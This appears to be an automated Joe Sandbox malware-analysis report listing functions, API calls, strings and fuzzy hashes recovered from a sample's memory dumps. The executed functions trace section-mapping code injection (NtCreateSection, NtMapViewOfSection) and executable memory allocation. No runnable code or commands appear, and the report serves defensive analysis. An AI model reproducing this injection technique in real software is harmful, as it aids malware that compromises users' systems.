Source File: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, Offset: 04130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4130000_rBwTlpgnjc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: e9e973fc7ee48611908425a841861b535a7b7600dd0c75fea6781d432008de7d
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0A01A7767006048FDF21CF24C854BEA37E5FB89217F4544F5E50697245E774B9418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00402381 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
Instruction ID: d35cd02017a8908298582cacd0956aff43537afd2df8e264233619bb44fb754d
Opcode Fuzzy Hash: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
Instruction Fuzzy Hash: 82C08C72D960008AE65BC6908A87644BB33F003830B341F2DC5018F126D272C2178220

Uniqueness

Uniqueness Score: -1.00%

Function 0040B114 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 155COMMON

Download Yara Rule

APIs

FindHandlerForForeignException.LIBCMT ref: 0040B133
___FrameUnwindToState.LIBCMT ref: 0040B19C
RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7

Strings

TEA, xrefs: 0040B166
LEA, xrefs: 0040B17E
RCC, xrefs: 0040B1F4
MOC, xrefs: 0040B1EC

Memory Dump Source

Source File: 00000000.00000002.2056595034.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_rBwTlpgnjc.jbxd

Similarity

API ID: EncodeExceptionFindForeignFrameHandlerPointerStateUnwind
String ID: LEA$MOC$RCC$TEA
API String ID: 1036487854-2731589300
Opcode ID: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
Instruction ID: fde7f3cf3d54f177af3fd344ca719e7cdbfe60c4783f3b80faa380b6aa17e4eb
Opcode Fuzzy Hash: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
Instruction Fuzzy Hash: E651BE32500109AFDF11DF80CC45EAEB766EF84318F1881AEFA1476292C739AD60CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B001 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

___TypeMatch.LIBCMT ref: 0040B031
IsInExceptionSpec.LIBCMT ref: 0040B0DA
___FrameUnwindToState.LIBCMT ref: 0040B19C
RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7

Strings

RCC, xrefs: 0040B1F4
MOC, xrefs: 0040B1EC

Memory Dump Source

Source File: 00000000.00000002.2056595034.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_rBwTlpgnjc.jbxd

Similarity

API ID: EncodeExceptionFrameMatchPointerSpecStateTypeUnwind
String ID: MOC$RCC
API String ID: 2268674365-2084237596
Opcode ID: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
Instruction ID: fe3876bf30caa339d60e068b76d1540c14f00c9adcebcf3be3f80ea161fb876a
Opcode Fuzzy Hash: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
Instruction Fuzzy Hash: 2D81AB31900209AFDF11DF94C845EAEBBB6FF48314F1481AAF91477291C739A961CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B856 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0040B87A

Part of subcall function 0040BF61: __fltout2.LIBCMT ref: 0040BF8A

__cftog_l.LIBCMT ref: 0040B8A0
__cftoe_l.LIBCMT ref: 0040B8D2

Memory Dump Source

Source File: 00000000.00000002.2056595034.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_rBwTlpgnjc.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 546156d34ab6ee1089efc4ea19fc89f106c9727d11cbe4cec4e4add1c920c602
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 0D013D7700014AFBCF126E94CC418EE3F66FF18354B588426FA6869171D33AC9B1AB89

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ivfjsrsPID: 4428, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	18.5%
Signature Coverage:	0%
Total number of Nodes:	265
Total number of Limit Nodes:	10

Executed Functions

Function 004013ED Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 310
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Strings

w, xrefs: 00401496

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: CreateDuplicateObjectSection
String ID: w
API String ID: 3132048701-476252946
Opcode ID: 300c2ecdd27e888ad78f13685a5e317154d6974f2db9774834ff63eb7b9d584a
Instruction ID: d66d783c96bdfa6dca3d1fe6600e499103a6ed67321a36542f9bdd634b40576e
Opcode Fuzzy Hash: 300c2ecdd27e888ad78f13685a5e317154d6974f2db9774834ff63eb7b9d584a
Instruction Fuzzy Hash: A0A11571904204EBEB209FA5CC44FAB7BB8FF81740F24413AF912BA2E1D7749906CB56

Uniqueness

Uniqueness Score: -1.00%

Function 004014E2 Relevance: 10.7, APIs: 7, Instructions: 183
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7299a8bd44a0f09a9814cad8d1b839903cf1e6b88029ded735f1f7f3eb76a162
Instruction ID: 54f816a1873a7b3c05ae102fbfa0db20c4fddfd22ceccde8511ae2322fd00f16
Opcode Fuzzy Hash: 7299a8bd44a0f09a9814cad8d1b839903cf1e6b88029ded735f1f7f3eb76a162
Instruction Fuzzy Hash: ED514B71900204BBEB209F91CC49FEFBBB8FF85B00F10412AF912BA2E4D6759905CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004014ED Relevance: 10.7, APIs: 7, Instructions: 182
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f8cd90a01b8841fab90bd03913f1d260bde8b9aa0dc8a539f499ff1e16c1cfe2
Instruction ID: d78456e69b9ee3bedd10ceae2949c316c70905ac9deb4f17dd21856c0d7271cf
Opcode Fuzzy Hash: f8cd90a01b8841fab90bd03913f1d260bde8b9aa0dc8a539f499ff1e16c1cfe2
Instruction Fuzzy Hash: 785139B1900209BFEB209F91CC48FEFBBB8EF85B04F144529F911BA2A5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401507 Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 9da137313ded7fbbc6789e5bb01359d8fcafad73d8b78d10eab5d550d18b9b7c
Instruction ID: 2f2d373c220c5723e0f020d1249cf16f546f345e4a7fd1e76d53166f9789eae4
Opcode Fuzzy Hash: 9da137313ded7fbbc6789e5bb01359d8fcafad73d8b78d10eab5d550d18b9b7c
Instruction Fuzzy Hash: CC5138B1900245BFEB209F92CC48FEFBBB8EF85B00F104129F911BA2E5D6719905CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401518 Relevance: 10.7, APIs: 7, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f5e5914faca7036a9f2b2587145b32dc03ad0df06ff91578a14921ad59b994f8
Instruction ID: 96445da88c21ac9a18ba7f06942a5f985ee594873a048ae4082ffef3eedc30ed
Opcode Fuzzy Hash: f5e5914faca7036a9f2b2587145b32dc03ad0df06ff91578a14921ad59b994f8
Instruction Fuzzy Hash: 765128B1900245BBEB209F92CC48FEFBBB8EF85B04F104529F911BA2E5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040151C Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: b3713ec08c7e04deb5c7f374484dc3bee9c28c2fff0b887679791a55d8476689
Instruction ID: bb4afbbbce9fe7f1faeb83e027975ebaba5635be540f9387007d6567f38c581b
Opcode Fuzzy Hash: b3713ec08c7e04deb5c7f374484dc3bee9c28c2fff0b887679791a55d8476689
Instruction Fuzzy Hash: 885119B1900245BFEF209F92CC48FDFBBB8FF85B14F144129F911AA2A5D6719945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 041A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 041A024D

Strings

cess, xrefs: 041A018D
kernel32.dll, xrefs: 041A008F, 041A0095

Memory Dump Source

Source File: 00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_41a0000_ivfjsrs.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f471ffde7cabfc19271dfa83d3be0f5a12fa30f5b419d0e0976dfc36b7c6a2e4
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 82527978A01229DFDB64CF98C984BACBBB1BF09304F1580D9E54DAB351DB30AA94DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0406B826 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0406B84E
Module32First.KERNEL32(00000000,00000224), ref: 0406B86E

Memory Dump Source

Source File: 00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp, Offset: 04064000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4064000_ivfjsrs.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: e174422aa6d717cfc53b0c3790fa746d5e19580b568c17e1e7ff5aa80c06708e
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 69F062715007216FE7203BB5A88CBAE76F8BF49725F100528EA47E20C0DA70F9458A61

Uniqueness

Uniqueness Score: -1.00%

Function 0040D47B Relevance: 3.0, APIs: 2, Instructions: 30
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,?,?,?,?,?,00000000,00000000,00000000,?,0040CC7E,?,?,00000000,?,00000000), ref: 0040D4A2
LCMapStringW.KERNEL32(00000000,?,?,?,?,?,?,0040CC7E,?,?,00000000,?,00000000,00000000), ref: 0040D4BF

Memory Dump Source

Source File: 00000004.00000002.2296802517.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_ivfjsrs.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
Instruction ID: 570daf4adb4621a24a7f0c796f3d6176889b68d62c2a7a6e92a15093398afc95
Opcode Fuzzy Hash: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
Instruction Fuzzy Hash: 74F01F72010109BFDF069FD4ED0ACEB3B6AFB48354B048429FA1855061D776A971AB95

Uniqueness

Uniqueness Score: -1.00%

Function 041A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,041A0223,?,?), ref: 041A0E19
SetErrorMode.KERNELBASE(00000000,?,?,041A0223,?,?), ref: 041A0E1E

Memory Dump Source

Source File: 00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_41a0000_ivfjsrs.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ceddcc526668fc0392ed59e733efbcad85e77cd8ef2a06cba1cf5d2cfe3a2db6
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 67D0123524512877DB002E94DC09BCD7F1CDF09B62F008051FB0DD9080C770954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 004018C3 Relevance: 1.3, APIs: 1, Instructions: 66
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 20e0d23e55f5860cd765092bcd1a4803eab56b051b47866fb1db2e929ae757d2
Instruction ID: 53cc65aa0172f3087033d362448bdc94b21a8511efdb665d8b99a9a355c9eb06
Opcode Fuzzy Hash: 20e0d23e55f5860cd765092bcd1a4803eab56b051b47866fb1db2e929ae757d2
Instruction Fuzzy Hash: 5B114FB220C205EBD6006A949D92E6A3668AB01754F308137BA477A1F0D17D9A53F76B

Uniqueness

Uniqueness Score: -1.00%

Function 004018CE Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 7169d427e5ce931a1b0669115664685f1c376e8f9b84ee4d7b06600fb2b6ce55
Instruction ID: c74ef3fd805783007b5872fe690244dae77f590db066df4350d3399cd1107ce2
Opcode Fuzzy Hash: 7169d427e5ce931a1b0669115664685f1c376e8f9b84ee4d7b06600fb2b6ce55
Instruction Fuzzy Hash: A211E9B2208205EBDB006BA0CC92FA93764AF01710F244177F6577A0F1D67D9A13EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 004018ED Relevance: 1.3, APIs: 1, Instructions: 54
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 06fc01ff54c1de9d0546f325fd6eb32fa967447e89cf10e9bb9eeb484df65950
Instruction ID: 5192c5fd7ad846daa7d68e837b6c6d3e663b4b5ca2644085206a245cacfb9c55
Opcode Fuzzy Hash: 06fc01ff54c1de9d0546f325fd6eb32fa967447e89cf10e9bb9eeb484df65950
Instruction Fuzzy Hash: C80152B2208205EBDB006AD09D91F6A3364AF01714F308137BA17790F1D67D9A53F71B

Uniqueness

Uniqueness Score: -1.00%

Function 004018F4 Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: aba4ed6962655fa9e58d9b243404d4cd8fbb99be38422038cecd155628e1f565
Instruction ID: 6301a06c588b47d17a354cf59e3a00cdfa51c18b5066a88522684ebbc7f3c5b3
Opcode Fuzzy Hash: aba4ed6962655fa9e58d9b243404d4cd8fbb99be38422038cecd155628e1f565
Instruction Fuzzy Hash: 3C0175B1248105EBDB006AE49D91FAE33546F05714F204133FA577A1F1D27D9913E76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401907 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Memory Dump Source

Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 621ccd25a172018797ce6621ebc33c4937c50a7202d72714c7e14af9fbaf8c42
Instruction ID: ddfa02207d2976e6176cbc7aeabde5bcf8e04bb4bd45437ba787a0bf3f4ebc64
Opcode Fuzzy Hash: 621ccd25a172018797ce6621ebc33c4937c50a7202d72714c7e14af9fbaf8c42
Instruction Fuzzy Hash: D10171B1208205EBDB006AE4DD91F6A3364AF05714F204137FA577A0F0C27E9A53E72B

Uniqueness

Uniqueness Score: -1.00%

Function 0406B4E5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0406B536

Memory Dump Source

Source File: 00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp, Offset: 04064000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4064000_ivfjsrs.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 88cbddd041efc29582ebe6b0e1d4dbe0651a1a35422045c04c08f73f78c3fbec
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 4E113979A00208EFDB01DF98C985E98BBF5AF08350F1580A4F949AB361D771EA90DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040B114 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 155COMMON

Download Yara Rule

APIs

FindHandlerForForeignException.LIBCMT ref: 0040B133
___FrameUnwindToState.LIBCMT ref: 0040B19C
RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7

Strings

LEA, xrefs: 0040B17E
MOC, xrefs: 0040B1EC
TEA, xrefs: 0040B166
RCC, xrefs: 0040B1F4

Memory Dump Source

Source File: 00000004.00000002.2296802517.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_ivfjsrs.jbxd

Similarity

API ID: EncodeExceptionFindForeignFrameHandlerPointerStateUnwind
String ID: LEA$MOC$RCC$TEA
API String ID: 1036487854-2731589300
Opcode ID: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
Instruction ID: fde7f3cf3d54f177af3fd344ca719e7cdbfe60c4783f3b80faa380b6aa17e4eb
Opcode Fuzzy Hash: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
Instruction Fuzzy Hash: E651BE32500109AFDF11DF80CC45EAEB766EF84318F1881AEFA1476292C739AD60CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B001 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

___TypeMatch.LIBCMT ref: 0040B031
IsInExceptionSpec.LIBCMT ref: 0040B0DA
___FrameUnwindToState.LIBCMT ref: 0040B19C
RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7

Strings

MOC, xrefs: 0040B1EC
RCC, xrefs: 0040B1F4

Memory Dump Source

Source File: 00000004.00000002.2296802517.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_ivfjsrs.jbxd

Similarity

API ID: EncodeExceptionFrameMatchPointerSpecStateTypeUnwind
String ID: MOC$RCC
API String ID: 2268674365-2084237596
Opcode ID: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
Instruction ID: fe3876bf30caa339d60e068b76d1540c14f00c9adcebcf3be3f80ea161fb876a
Opcode Fuzzy Hash: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
